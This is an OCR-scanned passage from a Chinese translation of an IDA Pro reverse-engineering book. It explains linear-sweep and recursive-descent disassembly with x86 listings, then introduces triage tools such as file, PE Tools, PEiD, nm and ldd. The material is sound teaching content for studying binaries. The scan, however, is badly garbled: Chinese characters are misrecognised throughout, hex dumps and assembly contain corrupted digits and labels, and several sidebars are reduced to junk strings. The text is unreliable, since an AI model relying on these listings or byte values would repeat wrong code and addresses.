401244: 8b 55 08 mov edx, DWORD PTR [ebp+8] 
401247: 83 fa oc cmp edx, Oxc 
40124a: of 87 90 00 00 00 ja 0x4012e0 
@ 401250: ff 24 95 57 12 40 00 jmp DWORD PTR [edx*4+0x401257] 
O 401257: e0 12 loopne 0x40126b 
401259: 40 inc eax 
40125a: 00 8b 12 40 00 90 add BYTE PTR [ebx-Ox6fffbfee|,cl 
401260: 12 40 00 adc al,BYTE PTR [eax] 
401263: 95 xchg ebp,eax 
401264: 12 40 00 adc al,BYTE PTR [eax] 
401267: 9a 12 40 00 a2 12 40 call 0x4012:0xa2004012 
40126e: 00 aa 12 40 00 b2 add BYTE PTR [edx-Ox4dffbfee|,ch 
401274: 12 40 00 adc al,BYTE PTR [eax] 
401277: ba 12 40 00 c2 mov edx ,0xc2004012 
40127C: 12 40 00 adc al,BYTE PTR [eax] 
40127f: ca 12 40 lret | 0x4012 
401282: 00 d2 add dl,dl 
401284: 12 40 00 adc al,BYTE PTR [eax] 
401287: da 12 ficom DWORD PTR [edx] 
401289: 40 inc eax 
401282: 00 8b 45 Oc eb 50 add BYTE PTR [ebx«0x50eb0c45], cl 
401290: 8b 45 10 mov eax,DWORD PTR [ebp+16 
401293: eb 4b jmp ^ 0x4012e0 








如 果 将 (6 ) 处 开始 的 连续 4 字 节 组 作为 小 端 (little endian )“ 值 分 析 ， 我 们 发 现 ， 每 个 字 节 
组 都 代表 一 个 指向 邻近 地 址 的 指针 。 实 际 上 ， 这 个 地 址 是 许多 跳 转 的 目的 地 址 ( 004012e0、 
0040128b, 00401290...) 中 的 一 个 。 因 此 ,( @ ) 处 的 1oopne 指令 并 不 是 一 条 指令 ; TH. UL 
明 线 性 扫描 算法 无 法 正确 地 将 航 入 的 数据 与 代码 区 分 开 来 。 

GNU 调试 天 ( gdb )、 微软 公司 的 WinDbg 调试 硕 和 objdump 实用 工具 的 反 汇 编 引 擎 均 采 用 线 
性 扫描 算法 。 


1.4.8 #19 FIEL 


递归 下 降 采 用 另外 一 种 不 同 的 方法 来 定位 指令 。 递 归 下 降 算 法 强调 控制 流 的 概念 。 控 制 流 根 
据 一 条 指令 是 否 被 男 一 条 指令 引用 来 决定 是 否 对 其 进行 反 汇编 。 为 便于 理解 递归 下 降 , 我 们 根据 
令 对 CPU 指令 指针 的 影响 对 它们 分 类 。 



































D 如 果 CPU 首先 存储 一 个 多 字 节 值 的 最 高 有 效 字 节 ， 则 称 该 CPU 为 大 端 (big-endian ) CPU; 如 果 该 CPU 首先 存 
储 最 低 有 效 字 节 ， 则 称 为 小 端 〈little-endial ) CPU, 
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1. 顺序 流 指 令 

顺序 流 指 令 将 执行 权 传 递 给 紧 随 其 后 的 下 一 条 指令 。 顺 序 流 指 令 的 例子 包括 简单 算术 指令 ， 
如 add; 寄存 此 与 内 存 之 间 的 传输 指令 ， 如 mov; 栈 操 作 指令 ， 如 push 和 pop。 这 些 指 令 的 反 汇 
编 过 程 以 线性 扫 摘 方式 进行 。 

2. 条 件 分 文 指令 

条 件 分 文 指令 ( 如 x86 jnz) 提供 两 条 可 能 的 执行 路 径 。 如 宁 条 件 为 真 ， 则 执行 分 文 ， 并 且 
必须 修改 指令 指针 ， 使 其 指 回 分 文 的 目标 。 但 是 ， 如 有 末 条 件 为 假 ， 则 继续 以 线性 模式 执行 指令 ， 
并 使 用 线性 扫 摘 方法 反 汇 编 下 一 条 指令 。 因 为 不 可 能 在 静态 环境 中 确定 条 件 测试 的 结果 , 递归 下 
降 算 法 会 反 汇 编 上 述 两 条 路 径 。 同 时 , 它 将 分 支 日 标 指 令 的 地 址 添加 到 稍 后 才 进 行 反 汇编 的 地 址 
列表 中 ， 从 而 推迟 分 支 目 标 指令 的 反 汇编 过 程 。 

3. 无 条 件 分 文 指令 

无 条 件 分 支 并 不 遵循 线性 流 模式 , 因此 , 它 由 递归 下 降 算法 以 不 同 的 方式 处 理 。 与 顺序 流 指 
令 一 样 ， 执 行 权 只 能 传递 给 一 条 指令 , 但 那 条 指令 不 需要 紧 接 在 分 文 指令 后 面 。 事 实 上 ， 如 代码 
清单 1-1 所 示 ， 根 本 没有 要 求 规定 在 无 条 件 分 文 后 必须 紧 跟 一 条 指令 。 因 此 ， 也 就 没有 理由 反 汇 
编 紧 跟 在 无 条 件 分 文 后 面 的 字 市 。 

递归 下 降 反 汇编 带 将 尝试 确定 无 条 件 跳 转 的 目标 , 并 将 目标 地 址 添加 到 要 反 汇 编 的 地 址 列表 
Po HIRIE, 某 些 无 条 件 分 支 可 能 会 给 递归 下 降 反 汇编 右 造 成 次 烦 。 如 果 跳 转 指 令 的 目标 取决 
于 一 个 运行 时 值 ， 这 时 使 用 静态 分 析 惑 无 法 确定 跳 转 目标 。x86 的 jmp eax 指令 就 证 实 了 这 个 问 
题 。 只 有 程序 确实 正在 运行 时 ，eax 寄存 表 中 才 会 包含 一 个 值 。 由 于 寄存 郁 在 静态 分 析 过 程 中 不 
包含 任何 值 ， 因 此 无 法 确定 跳 转 指令 的 目标 ， 也 就 无 法 确定 该 从 什么 地 方 继续 反 汇 编 过 程 。 

4. 函数 调用 指令 

中 数 调用 指令 的 运行 方式 与 无 条 件 跳 转 指 令 非 常 相似 (包括 反 汇 编 右 无 法 确定 call eax 等 指 
令 的 目标 )， 唯 一 的 不 同 在 于 ， 一 旦 困 数 完成 ， 执 行 权 将 返回 给 紧 跟 在 调用 指令 后 面 的 指令 。 在 这 
方面 , 它们 与 条 件 分 文 指令 类 似 , 因为 它们 都 生成 两 条 执行 路 径 。 调 用 指令 的 目标 地 址 被 添加 到 推 
述 进 行 反 沪 编 的 地 址 列表 中 ， 而 紧 跟 在 调用 后 面 的 指令 则 以 类 似 于 线性 扫 摘 的 方式 进行 反 汇 编 。 

从 被 调用 函数 返回 时 ， 如 果 程 序 的 运行 出 现 异 第 ,递归 下 降 萄 有 可 能 失败 。 ml. ëtt 
代码 可 能 会 有 意 审 改 该 阴 数 的 返回 地 址 , 这 样 ,在 孙 数 完成 时 ,控制 权 将 返回 到 一 个 反 汇 编 右 无 
法 预知 的 地 址 。 下 面 的 错误 代码 束 古 一 个 体 单 的 例子 。 在 这 个 例 于 中， 函数 foo 在 返回 调用 方 之 
前 ， 对 返回 地 址 加 了 1。 



























































foo proc near 
FF 04 24 inc dword ptr [esp] ; increments saved return addr 
C3 retn 

foo endp 

bar: 


E8 F7 FF FF FE call foo 
05 89 45 F8 90 @add eax, 90F84589h 


LA ”如 何 反 汇编 9 


结果 ， 在 调用 foo 之 后 ， 探 制 权 实际 上 并 未 返回 给 (@ ) 处 的 add 指令。 正确 的 反 汇 编 过 程 
如 下 所 示 。 





foo proc near 
FF 04 24 inc dword ptr [esp] 
t3 retn 
foo endp 
bar: 
ES F7 FF FF FF call foo 
05 db 5 ;formerly the first byte of the add instruction 
89 45 F8 Omov X [ebp-8], eax 
90 nop 





VI Efe g RR (Rep Zon Scb E, mër foo 将 控制 权 返 回 给 了 位 于 四处 的 
mov 指令 。 值 得 注意 的 是 ， 线 性 扫描 反 汇 编 右 可 能 也 同样 无 法 正确 对 这 段 代码 反 汇 编 ， 只 是 原因 
稍 有 不 同 。 

5. 返回 指令 

有 时 ， 递 归 下 降 算 法 访问 了 所 有 的 路 径 。 而 且 ， 函 数 返回 指令 (如 x86 ret) 没有 提供 接 下 
来 将 要 执行 的 指令 的 信息 。 这 时 , 如 果 程 序 确实 正在 运行 , 则 可 以 从 运行 时 栈 顶 部 获得 一 个 地 址 ， 
并 从 这 个 地 址 开始 恢复 执行 指令 。 但 是 , 反 汇 编 器 并 不 具备 访问 栈 的 能 力 , 因此 反 汇 编 过 程 会 突 
然 终止 。 这 时 ,递归 下 降 反 汇编 套 会 转 而 处 理 前 面 搁置 在 一 劳 的 延 开 反 汇 编 地 址 列表 。 反 汇编 套 
从 这 个 列表 中 取出 一 个 地 址 , 并 从 这 个 地 址 开始 继续 反 汇 编 过 程 。 递 归 下 降 反 汇编 算法 正 是 因此 
而 得 名 。 

递归 下 降 算法 的 一 个 主要 优点 在 于 , 它 具 有 区 分 代码 与 数据 的 强大 能 力 。 作 为 一 种 基于 控制 
流 的 算法 , 它 很 少 会 在 反 汇 编 过 程 中 错误 地 将 数据 值 作 为 代码 处 理 。 递归 下 降 算法 的 主要 缺点 在 
于 ， 它 无 法 处 理 间接 代码 路 径 ， 如 利用 指针 表 来 查找 目标 地 址 的 跳 转 或 调用 。 然 而 ,通过 采用 一 
些 用 于 识别 指向 代码 的 指针 的 启发 〈 heuristics ) 式 方法 ， 递归 下 降 反 汇编 器 能 够 提供 所 有 代码 ， 
并 清楚 地 区 分 代码 与 数据 。 代码 清 单 1-2 是 对 前 面 代码 清单 1-1 中 的 switch 语句 应 用 递归 下 降 反 
汇编 硕 所 得 到 的 结 


代码 清单 1-2 ”递归 下 降 反 汇编 
0040123F push ebp 
00401240 mov ebp, esp 
00401242 xor eax, eax 
00401244 mov edx, [ebp+arg_0] 
00401247 cmp edx, OCh 


























: Switch 13 cases 


3 
0040124A ja loc 4012E0 ; default 
0040124A ; jumptable 00401250 case 0 
00401250 jmp ds:off 401257[edx*4] ; switch jump 
00401250 ; --------------------------------------------------- 


00401257 off 401257: 
00401257 dd offset loc 4012bEO ; DATA XREF: sub 40123F411r 
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00401257 dd offset loc 40128B ; jump table for switch statement 
00401257 dd offset loc 401290 

00401257 dd offset loc 401295 

00401257 dd offset loc 40129A 

00401257 dd offset loc 401242 

00401257 dd offset loc 4012AA 

00401257 dd offset loc 4012B2 

00401257 dd offset loc 4012BA 

00401257 dd offset loc 4012C2 

00401257 dd offset loc 4012CA 

00401257 dd offset loc 4012D2 

00401257 dd offset loc 4012DA 

ÜOAOTOBB. 9 
0040128B 

0040128B loc 40128B: ; CODE XREF: sub 40123F«411j 
0040128B ; DATA XREF: sub 40123F:off 4012570 
0040128B mov eax, [ebp«arg 4] ; jumptable 00401250 case 1 
0040128bE jmp short loc 4012bEO ; default 

0040128E ; jumptable 00401250 case O 


注意 ， 跳 转 目 标 表 已 被 识别 出 来 ， 并 进行 了 相应 的 格式 化 。IDA Pro 是 一 种 最 为 典型 的 递归 
下 降 反 汇编 各 。 了 解 递归 下 降 过 程 有 助 于 我 们 识别 IDA 无 法 进行 最 佳 反 汇编 的 情形 ， 以 及 制定 
策略 来 改进 IDA 的 输出 结 


小 结 


1.5 








EEH TL Shin] AURRA Y ESCAS? 没有 必要 。 了 解 这 些 算 法 会 有 益处 吗 ? 
当然 ! 在 进行 逆 癌 工程 时 , 选 一 个 得 心 应 手 的 好 工具 至 关 重 要 。IDA 具有 诸多 优点 , 其 中 之 一 是 : 
与 其 他 许多 反 汇 编 硕 不 同 , 它 为 你 提供 大 量 机 会 来 指导 和 推翻 它 的 决定 。 最 终 的 结果 是 准确 的 反 
汇编 ， 这 一 结果 远 胜 于 其 他 任何 结 

在 下 一 章 ， 我 们 将 介绍 一 系列 可 在 各 种 逆 回 工程 情形 下 使 用 的 现 有 工具 。 虽 然 它 们 与 IDA 
没有 和 卫 接 关系 ,但 其 中 许多 工具 都 与 IDA 相互 影响 过 ， 而 且 它 们 有 助 于 我 们 解释 在 IDA. HP 
面 上 显示 的 大 量 信 息 。 


























3& [5) 3 SiL 2s TL RR 


解 反 汇 编 的 一 些 背 景 知 识 后 ， 在 深入 学 习 IDA Pro 之 前 ， 介 绍 其 他 一 些 用 于 逆向 工 

程 二 进 制 文件 的 工具 ， 会 对 我 们 的 学 习 有 所 帮助 。 这 些 工具 大 多 在 IDA 之 前 发 布 ， 
并 且 仍 然 可 用 于 快速 分 析 二 进 制 文件 ,以 及 审查 IDA 的 分 析 绪 东 。 如 我 们 所 见 , IDA 将 这 些 工 
具 的 诸多 功能 整合 到 它 的 用 户 界 面 中 ,为 逆 癌 工程 提供 了 一 个 集成 环境 。 最 后 , 尽管 IDA 确实 
包含 一 个 集成 调试 各 ,但 在 这 儿 我 们 不 会 讨论 这 个 主题 ， 因 为 第 24 EA 26 章 会 专门 介绍 这 
一 主题 。 





2.1 分 类 工具 


通 第 ,在 初次 直到 一 个 不 台 悉 的 文件 时 ， 有 必要 问 目 己 一 些 人 简单 的 问题 ,如 “这 是 个 什么 文 
件 ”， 回 答 这 个 问题 的 首要 原则 是 ， 绝 不 要 根据 文件 的 扩展 名 来 确定 文件 的 类 型 。 这 是 最 基本 的 
原则 。 在 脑子 里 建立 起 “文件 扩展 名 并 无 实际 意义 ”的 印象 后 ， 你 就 会 开始 考虑 学 习 下 面 几 个 实 
用 工具 。 











2.1.1 file 


file 命令 是 一 个 标准 的 实用 工具 ， 大 多 数 *NIX 风格 的 操作 系统 和 Windows 下 的 Cygwin 8X 
MinGw 工具 都 带 有 这 个 实用 工具 ,file 试 图 通过 检查 文件 中 的 某 些 特定 字段 来 确认 文件 的 类 型 。 
有 时 ，file 能 够 识别 常见 的 字符 串 ， 如 #1!/bin/sh (shel 脚本 文件 ) 或 <htm1> ( HTML 文档 ), 但 
是 ,识别 那些 包含 非 ASCI 内 容 的 文件 要 困难 得 多 ， 在 这 种 情况 下 ，file 会 设法 判断 该 文件 的 
结构 是 否 符 合 某 种 已 知 的 文件 格式 。 多 数 情 况 下 ， 它 会 搜索 某 些 文件 类 型 所 特有 的 标签 值 (通常 
称 为 幻 数 ”)。 下 面 的 十 六 进 制 表 列 出 了 几 个 用 于 判断 常见 文件 类 型 的 幻 数 。 

















(D 参见 http://www.cygwin.com/。 

D 参见 http:/www.mingw.org/。 

(3) 幻 数 是 一 些 文件 格式 规范 所 要 求 的 特殊 标签 值 ， 它 表示 文件 符合 这 种 规范 。 有 时 候 ， 人 们 在 选择 幻 数 时 加 入 了 项 
默 的 因素 。 例如 , MS-DOS 的 可 执行 文件 头 中 的 MZ 标签 是 MS-DOS 原 架 构 师 Mark Zbikowski 姓名 的 首 字母 缩写 。 
众所周知 ，Java DI class 文件 的 幻 数 为 十 六 进 制 数 0xcafebabe, 选择 它 作 为 幻 数 , 仅仅 是 因为 它 是 一 个 容易 记忆 的 
十 六 进 制 数字 符 串 。 
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Windows PE executable file 
00000000 4D 5A 90 00 03 000000 04000000 FF FF 00 00 MZ.............. 
00000010 B8 00 0000 00 0000 00 400000000 00000000 ........ (MES 


Jpeg image file 
00000000 FF D8 FF EO 00 10 4A 46 49 46 0001 0101 00 60 ...... JFIF. ws i 
00000010 00 60 00 00 FF DB 00 43 00 OA 07 07 08 07 06 0A .....， tune dur 


Java .class file 
00000000 CA FE BA BE 00 000032 00980A00 2E 00 3E 08 ....... Zuma >. 
00000010 00 3F 09 00 40 00 4108 00 42 OA 0O 43 0044 OA .?..@.A..B..C.D. 


file 能 够 识别 大 量 的 文件 格式 ,包括 数 种 ASCII 文本 文件 .各 种 可 执行 文件 和 数据 文件 ,file 
执行 的 幻 数 检查 由 幻 数 文件 ( magic file ) 所 包含 的 规则 控制 。 约 数 文件 的 默认 位 置 因 操作 系统 而 
T, 常见 的 位 置 包 括 /usr/share/file/magic /usr/share/misc/magic jil/etc/magics tX T fif. SH ZHoeZ] 
数 文件 的 信息 ， 请 参阅 file 的 文档 资料 。 


Cygwin 环境 


Cygwin[] Windows[] [D] [] LH DL UL UO DHL BL O HE BL OTE CEU] Einux DUDU shell [] D] E] L 
CODE BEBE OPO OO D'ODOKDIDD'DD-DD ere D een d OU 
Perl[] Python[] Ruby OHO LL D [D] DL D U ach ssh[] DUDU Cygwin (HET EE D]. ms E] E] 
UOUULDUUED Windows [UU U U LU U UE LI 


在 某 些 情况 下 ，file 还 能 够 辨别 茶 一 指定 文件 类 型 中 的 细微 变化 。 以 下 代码 证 实 了 file 
仅 能 够 识别 几 种 不 同 的 ELF 二 进 制 文件 ， 而 且 还 提供 了 有 关 二 进 制 文件 如 何 链接 〈 毅 态 或 动态 ) 
以 及 是 否 去 除了 符 扎 等 信息 。 


idabook# file ch2 ex * 











ch2 ex.exe: MS-DOS executable PE Tor MS Windows (console) 
Intel 80386 32-bit 

ch2 ex upx.exe: MS-DOS executable PE Tor MS Windows (console) 
Intel 80386 32-bit, UPX compressed 

ch2 ex freebsd: ELF 32-bit LSB executable, Intel 80386, 


version 1 (FreeBSD), for FreeBSD 5.4, 
dynamically linked (uses shared libs), 
FreeBSD-style, not stripped 
ch2 ex freebsd static: ELF 32-bit LSB executable, Intel 80386, 
version 1 (FreeBSD), for FreeBSD 5.4, 
statically linked, FreeBSD-style, not stripped 
ch2 ex freebsd static strip: ELF 32-bit LSB executable, Intel 80386, 
version 1 (FreeBSD), for FreeBSD 5.4, 
statically linked, FreeBSD-style, stripped 
ch2 ex linux: ELF 32-bit LSB executable, Intel 80386, 
version 1 (SYSV), for GNU/Linux 2.6.9, 
dynamically linked (uses shared libs), 
not stripped 


ch2 ex linux static: ELF 32-bit LSB executable, Intel 80386, 
version 1 (SYSV), for GNU/Linux 2.6.9, 
statically linked, not stripped 

ch2 ex linux static strip: ELF 32-bit LSB executable, Intel 80386, 
version 1 (SYSV), for GNU/Linux 2.6.9, 
statically linked, stripped 

ch2 ex linux stripped: ELF 32-bit LSB executable, Intel 80386, 
version 1 (SYSV), for GNU/Linux 2.6.9, 
dynamically linked (uses shared libs), stripped 


去 除 二 进 制 可 执行 文件 的 符号 


加 本 加 
DOUD D Ok: EE ILE RETE D OD D DOE DIE UO H DOC UD UL ELT Dr 
OD OD DOHpDOHEDOODIDUOEID IAU HOCH HOCH DI OD: EO 
(DUDUDDUUUDUDDUDUDUUUDUDDUDUUUDDDDOUUDUDDUDUUUDUDUIDU 
OH DD EL ET IE. Sr E DOP a o E E o o g o E a o E o Ea E E E a oe n 
H E E E E a E e 要 本 


file 及 类 似 的 实用 工具 同样 也 会 出 错 。 如 果 一 个 文件 碰巧 包含 了 某 种 文件 格式 的 标记 ，file 
等 工具 很 可 能 会 错误 地 识别 这 个 文件 。 你 可 以 使 用 一 个 十 六 进 制 文件 编辑 器 将 任何 文件 的 前 4 字 
市 修改 为 Java 的 幻 数 序列 CA FE BA BE， 目 己 证 实 一 下 上 述 情 况 。 这 时 ，file 会 将 这 个 新 修改 的 
文件 错误 地 识别 为 已 编译 的 Java 类 数据 。 同 样 ， 一 个 仅 包 含 MZ 这 两 个 字符 的 文本 文件 会 被 误 认 
为 是 一 个 MS-DOS 可 执行 文件 。 在 迹 门 工程 过 程 中 ， 绝 不 要 完全 相信 任何 工具 所 提供 的 结果 ， 
除非 该 结果 得 到 其 他 几 款 工具 和 手动 分 析 的 确认 ， 这 是 一 个 恨 好 的 习惯 。 


2.1.2 PE Tools 





























PE Tools" 是 一 组 用 于 分 析 Windows 系统 中 正在 运行 的 进程 和 可 执行 文件 的 工具 。PE Tools 的 主 
界面 如 图 2-1 所 示 ， 其 中 列 出 了 所 有 活动 进程 ， 你 可 以 通过 该 界面 访问 PE Tools 的 所 有 实用 工具 。 


ID PE Tools v1.5 RC7 by NEOx/[uinC], http:/ /www.uinc.ru/ 
File View Tools PlugIns Options Help 











OLR wi Wl Enge 





Path PID Image Base Image Size 
加 -cygwin\bin\bash,exe 00000828 00400000 00074000 
É i j 32\cmd.exe 00000e 





ici windowslsystem32cmd. exe 6 
加 -cygwin\bin\bash,exe 00000564 00400000 00074000 
Bc: \windowstsystem32\cmd.exe 00000464 4AD0000O 00061000 
E]c'icygwinibintbash.exe 00000048 00400000 00074000 


*I*L 


Image Base Image Size 
4AD00000 00061000 
ciwindowslsystem32ntdll. d 7C900000 000B0000 
cwindows\system32\kernel32,dll 7C800000 DooF5000 
ciwindowslsystem32Wmsvcrt. dll 77C10000 00058000 


` cwindows\system32\user32,dll 7E410000 00090000 
yj c: \windowstsystem32\gdi32.dll 77F10000 00047000 
bj c:\windowsisystem32\advapi32.dll 77DD0000 00098000 sl 


Memory: 694560 Kb/2519560 Kb E 





图 2-1 PE Tools 实用 工具 


(D 参见 http://petools.org.ru/petools.shtml。 
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在 进程 列表 中 ， 用 户 可 以 将 一 个 进程 的 内 存 映 像 转 储 到 茶 个 文件 中 ， 也 可 以 使 用 PE Sniffer 
实用 工具 确定 可 执行 文件 由 何 种 编 详 希 构建 , 或 者 该 文件 是 否 经 过 某 种 已 知 的 模糊 实用 工具 的 模 
糊 处 理 。Tools 菜单 提供 了 分 析 人 磁盘 文件 的 类 似 选 项 。 另 外 ,用户 还 可 以 使 用 内 秽 的 PE Editor SC 
用 工具 查看 PE 文件 头 字 段 ， 使 用 该 工具 还 可 以 方便 地 修改 任何 文件 头 的 值 。 通 笛 ， 如 采 想 要 从 











一 个 文件 的 模糊 版 本 重建 一 个 有 效 的 PE， 就 需要 修改 PE 文件 头 。 


DUDobfuscaron UD UI 
AE E 和 
相国 加 本 加 本 本 可 古本 古本 本 
COU OO OD OD Op DUpDDHpDDEDHDEIH. 20 HIT DOUD LIRE LB ID 


二 进 制 文件 模糊 技术 


Ugagauiuiuiululllultl 


2.1.3 PEID 


PEiD" 是 男 一 款 Windows 工具 ， 它 主要 用 于 识别 构建 某 一 特定 Windows PE 二 进 制 文件 所 使 
用 的 编译 器 ， 并 确定 任何 用 于 模糊 Windows PE 二 进 制 文件 的 工具 。 图 2-2 显示 了 如 何 使 用 PEiD 


确定 模糊 Gaobo 人 te 蠕虫 的 一 个 变种 所 使 用 的 工具 (此 例 中 为 ASPack )。 








PEiD 的 许多 其 他 功能 与 PE Tools 的 功能 相同 , 包括 显示 PE 文件 头 信息 摘要 、 收 集 有 关 正 在 





PE PED v0.94 1 二 | 品 | Sl 
File: |CIdaBooklegsvc32.exe aspack [Ez] 
Enkrypaink: [00055001 EF Section: | aspack 
File Offset: [00014201 First Bytes: [60,E8,03,00 
Linker Info: [6.0 Subsystem: [win32 GUI 


[ ASPack 2,12--Alexey Soladavnikov 
EES 
RS Stay op top 





图 2-2 ”PEiD 实用 工具 


运行 的 进程 的 信息 、 执 行 基 本 的 反 汇编 等 。 


2.2 摘要 工具 





由 于 我 们 的 目标 是 对 二 进 制程 序 文件 进行 逆向 工程 ,因此 , 在 对 文件 进行 初步 分 类 后 ， 


(D 参见 http://peid.info/。 


(2) 参见 http://securityresponse.symantec.com/security response/writeup.jsp?docid-2003-112112-1102-99, 
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用 更 高 级 的 工具 来 提取 详尽 的 信息 。 本 节 讨 论 的 工具 不 仅 能 识别 它们 所 处 理 的 文件 的 格式 ,更 重 
要 的 是 还 能 够 理解 某 一 特定 的 文件 格式 , 并 且 能 够 解析 它们 的 输入 文件 , 提取 出 这 些 输入 文件 所 
包含 的 非 第 特别 的 信息 。 








2.2.1 nm 

将 源 文 件 编译 成 目标 文件 时 ， 编 译 需 必 须 藤 入 一 些 全 局 (外 部 ) 符号 的 位 置信 息 ， 以 便 链 接 
需 在 组 合 目标 文件 以 创建 可 执行 文件 时 , 能 够 解析 对 这 些 符 号 的 引用 。 除 非 被 告知 要 去 除 最 终 的 
可 执行 文件 中 的 符 扣 ,和 否则， 链接 融通 稼 会 将 目标 文件 中 的 符号 珊 入 最 终 的 可 执行 文件 中 。 根 据 
nm 手册 的 描述 ， 这 一 实用 工具 的 作用 是 “列举 目标 文件 中 的 符号 ”。 

使 用 nm 检查 中 间 目 标 文件 (扩展 名 为 .o 的 文件 ， 而 非 可 执行 文件 ) 时 ， 默 认输 出 结果 是 在 
这 个 文件 中 声明 的 任何 函数 和 全 局 变量 的 名 称 。nm 实用 工具 的 样本 输出 如 下 所 示 。 














idabook# gcc -c ch2 example.c 
idabook# nm ch2 example.o 
U  stderrp 
U exit 
U fprintf 
00000038 T get max 
00000000 t hidden 
00000088 T main 
00000000 D my initialized global 
00000004 C my unitialized global 
U printf 
U rand 
U scanf 
U srand 
U time 
00000010 T usage 
idabook# 


从 中 可 以 看 到 ，nm 列 出 了 每 一 个 符号 以 及 与 待 号 有 天 的 一 些 信息 。 其 中 的 字母 表示 所 列举 
的 符号 的 类 型 。 前 面 的 例子 中 出 现 了 以 下 字母 ， 下 面 逐 一 解释 。 

U， 未 定义 符号 ， 通 第 为 外 部 符号 引用 。 

1T， 在 文本 部 分 定义 的 符号 ， 通 肖 为 函数 名 称 。 

t， 在 文本 部 分 定义 的 局 部 符号 。 在 C 程序 中 ， 这 个 符号 通 第 等 同 于 一 个 静态 水 数 。 

D 

$ 





， 已 初始 化 的 数据 值 。 
， 示 初始 化 的 数据 值 。 


说 明 D00000000000000000000000000mD0000000000 
(DUU 
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WRH nm 列举 可 执行 文件 中 的 符号 ， 将 会 有 更 多 信息 显示 出 来 。 在 链接 过 程 中 ， 符 所 被 
解析 成 虚拟 地 址 (如 有 可 能 )。 因 此 , 这 时 运行 nm, 将 可 获得 更 多 信息 。 下 面 是 使 用 nm 处 理 一 个 
可 执行 文件 所 得 到 的 部 分 输出 。 














idabook# gcc -0 ch2 example ch2 example.c 
idabook# nm ch2 example 
Vs uw a» 
U exit 
U fprintf 
080485cO t frame dummy 
08048644 T get max 
0804860c t hidden 
08048694 T main 
0804997c D my initialized global 
08049a9c B my unitialized global 
08049380 b object.2 
08049978 d p.0 
U printf 
U rand 
U scanf 
U srand 
U time 
0804861c T usage 
idabooldt 


在 这 个 例子 中 , 一些 符号 (如 main ) 被 分 配 了 虚拟 地 址 ， 链 接 过 程 引 入 了 一 些 新 的 符号 (如 
frame dummy )， 另 一 些 符号 (如 my unitialized global) 的 类 型 发 生 了 改变 ， 其 他 符号 由 于 继续 
引用 外 部 符号 ， 仍 旧 为 未 定义 符号 。 在 这 个 例子 中 ， 我 们 检测 的 文件 属于 动态 链接 二 进 制 文件 ， 
为 此 ， 未 定义 的 符号 将 在 C 语 言 共 享 库 中 定义 。 谷 了解 更 多 有 关 nm 的 信息 ， 请 参阅 nm 手册 。 

















2.2.2 Idd 


DI nl Hurt vn, RUIT VOCI 5 AEE P KRE. 链接 器 通过 两 种 方法 解析 对 
库 函 数 的 调用 : 静态 链接 (static linking ) 和 动态 链接 (dynamic linking ), BEE H Dit an 415 4X 
决定 具体 使 用 哪 一 种 方法 。 一 个 可 执行 文件 可 能 为 静态 链接 、 动 态 链接 ， 或 二 者 兼 而 有 之 ”。 

如 果 要 求 使 用 静态 链接 ,链接 需 会 将 应 用 程序 的 目标 文件 和 所 需 的 库 文件 组 合 起 来 , 生成 一 
个 可 执行 文件 。 这 样 , 在 运行 时 就 不 需要 确定 库 代 但 的 位 置 , 因为 它 已 经 包含 在 可 执行 文件 中 了 。 
静态 链接 的 优点 包括 : 函数 调用 更 快 一 些 ; 发 布 二 进 制 文件 更 加 容易 ,因为 这 时 不 需要 对 用 户 系 
统 中 库 孔 数 的 可 用 性 做 出 任何 假设 ,其 缺点 包括 : 生成 的 可 执行 文件 更 大 ; 如 果 库 组 件 发 和 后 改变 ， 
对 程序 进行 升级 会 更 加 困难 , 因为 一 旦 库 发 生变 化 , 程序 就 必须 重新 链接 。 从 逆 癌 工程 的 角度 看 ， 
静态 链接 使 问题 更 加 复杂 。 在 分 析 一 个 静态 链接 二 进 制 文件 时 ， 要 回答 “这 个 二 进 制 文件 链接 了 
哪些 库 ” 和 “这 些 函 数 中 哪 一 个 是 二 进 制 函 数 ” 可 不 那么 容易 。 我 们 将 在 第 12 章 讨 论 在 对 静态 


























D 欲 了 解 更 多 有 关 链 接 的 信息 ， 请 参阅 John Levine 的 著作 Linkers and Loaders ( San Francisco: Morgan Kaufmann，2000 )。 


2.2 摘要 工具 17 


链接 代码 进行 逆向 工程 时 遇 到 的 挑战 。 

动态 链接 与 静态 链接 不 同 。 使 用 动态 链接 时 ， 链 接 器 不 需要 复制 它 需 要 的 任何 库 。 相 反 ， 链 
Biss Hon rise (通常 为 .so 或 .dll 文件 ) 的 引用 插入 到 最 终 的 可 执行 文件 中 。 因 此 ， 这 时 生 
成 的 可 执行 文件 也 更 小 一 些 。 而 且 , 使 用 动态 链接 时 升级 库 代 人 码 也 变 得 简单 多 了 ， 因 为 只 需要 维 
护 一 个 库 〈 被 许多 二 进 制 文件 引用 )， 如 果 需 要 升级 库 代 码 ， 用 新 版 本 的 库 蔡 换 过 时 的 库 ， 就 可 
以 立即 更 新 每 一 个 引用 该 库 的 二 进 制 文件 。 使 用 动态 链接 的 一 个 缺点 在 于 , 它 需 要 更 加 复杂 的 加 
载 过 程 。 因 为 这 时 必须 定位 所 有 所 需 的 库 ， 并 将 其 加 载 到 内 存 中 ， 而 不 是 加 载 一 个 包含 全 部 库 代 
但 的 静态 链接 文件 。 动 态 链 接 的 兄 一 个 缺点 是 ,供应 商 不 仅 需 要 发 布 他 们 目 己 的 可 执行 文件 ， 而 
上 且 必须 发 布 该 文件 所 需 的 所 有 库 文件 。 如 果 一 个 系统 无 法 提供 程序 所 需 的 全 部 库 文 件 , 在 这 个 系 
统 上 运行 该 程序 将 会 导致 错误 。 

下 面 的 输出 说 明了 一 个 程序 的 动态 和 静态 链接 版 本 的 创建 过 程 、 生 成 的 二 进 制 文件 的 大 小 ， 
以 及 如 何 使 用 file 工具 识别 这 两 个 二 进 制 文件 。 









































idabook# gcc -o ch2 example dynamic ch2 example.c 

idabook# gcc -o ch2 example static ch2 example.c --static 

idabooks ls -1 ch2 example * 

-INWXIT-XT-X 1 root wheel 6017 Sep 26 11:24 ch2 example dynamic 

-rWwxr-xr-x 1 root wheel 167987 Sep 26 11:23 ch2 example static 

idabook# file ch2 example * 

ch2 example dynamic: ELF 32-bit LSB executable, Intel 80386, version 1 
(FreeBSD), dynamically linked (uses shared libs), not stripped 

ch2 example static: ELF 32-bit LSB executable, Intel 80386, version 1 
(FreeBSD), statically linked, not stripped 

idabooldt 


为 了 确保 动态 链接 正常 运行 , 动态 链接 二 进 制 文件 必须 指明 它 需要 的 库 文件 ,以 及 需要 这 些 
